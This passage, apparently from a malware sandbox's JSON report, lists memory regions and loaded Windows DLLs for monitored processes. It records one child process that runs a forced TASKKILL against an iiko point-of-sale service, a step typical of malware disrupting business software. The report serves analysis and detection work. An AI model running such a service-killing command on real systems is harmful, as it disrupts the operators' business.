1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_3026", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:25.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3027", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:25.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3028", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:25.321", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_3029", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:01:25.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33882111, "entry_point": 0, "filename": null, "id": "region_3030", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:25.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3031", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:25.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_3032", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:25.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33882112, "type": "region", "version": 1 }, "end_va": 36827135, "entry_point": 33882112, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3033", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33882112, "timestamp": "00:01:25.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36962304, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_3034", "name": "private_0x0000000002340000", "norm_filename": null, "region_type": "private_memory", "start_va": 36962304, "timestamp": "00:01:25.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3035", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:25.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3036", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:25.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3037", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:25.339", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3038", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:25.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37683199, "entry_point": 0, "filename": null, "id": "region_3039", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:01:25.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 37945343, "entry_point": 0, "filename": null, "id": "region_3040", "name": "private_0x00000000023f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37683200, "timestamp": "00:01:25.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38535167, "entry_point": 0, "filename": null, "id": "region_3041", "name": "private_0x0000000002480000", "norm_filename": null, "region_type": "private_memory", "start_va": 38273024, "timestamp": "00:01:25.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 38993919, "entry_point": 0, "filename": null, "id": "region_3042", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:01:25.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3043", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:25.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3044", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:25.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3045", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:25.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785926453, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3046", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:25.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786181817, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3047", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:25.432", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM iikoNet.Pos.WinService.exe /IM iikoNet.Pos.WinService.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_23", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 23, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3048", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3049", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:25.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3050", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3051", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:25.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3052", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:25.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_3053", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:25.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_3054", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:25.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 8085503, "entry_point": 8019081, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3055", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 7995392, "timestamp": "00:01:25.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3056", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3057", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3058", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3059", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3060", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3061", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:25.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3062", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:25.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3063", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:25.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3064", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:25.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_3065", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:25.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3066", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:25.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3067", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:25.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3068", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:25.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3069", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:25.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3070", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:25.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3071", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:25.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3072", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:25.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1601535, "entry_point": 1179648, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3073", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:25.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_3074", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:25.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_3075", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:01:25.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3076", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:25.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3077", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:25.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3078", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:25.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3079", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:25.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3080", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:25.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3081", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:25.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3082", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:25.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3083", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:25.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3084", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:25.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3085", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:25.823", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3086", "name": "cryptbase.dll", "norm_filename": 